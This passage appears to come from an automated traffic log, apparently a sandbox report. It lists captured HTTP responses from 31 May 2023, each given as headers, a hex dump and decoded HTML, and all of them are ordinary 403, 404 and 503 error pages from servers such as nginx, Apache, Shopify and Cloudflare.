3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=13X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: e256a995-5d35-46b4-abbb-49449257fadaCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1GR%2BweGsu3pKvD0OM%2BCEq3meIQCakKfwd54rZW8Y7HKsSbA6XYhCMSfQzKUH1qV8Vh9YpbdDcZePgQ2sBmzzDiosHdxknmb8DHOpKqjCnH6BPvMDwMKQWjV%2B%2FA5g"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=147.999763Server: cloudflareCF-RAY: 7cff59f5a9ba2c41-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 699date: Wed, 31 May 2023 12:51:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1><h2 style="margin-top:20px;font-size: 30px;">Forbidden</h2><p>Access
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 699date: Wed, 31 May 2023 12:51:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1><h2 style="margin-top:20px;font-size: 30px;">Forbidden</h2><p>Access
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:58 GMTServer: ApacheContent-Length: 318Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:52:14 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1K1cjHHmiZOZeFDMVy%2FYoPgcWlt1zRzTQQNzwVBmCYkWUaV5izuRbfxF5bYr%2BfM5sbDf9z8MzB6BNMiiSWYJDm2b7jHE%2FAOsjslMKshRNci6%2BdXSRCCghqtH1Uok"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59fa59b93a98-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 11a2<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:59 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
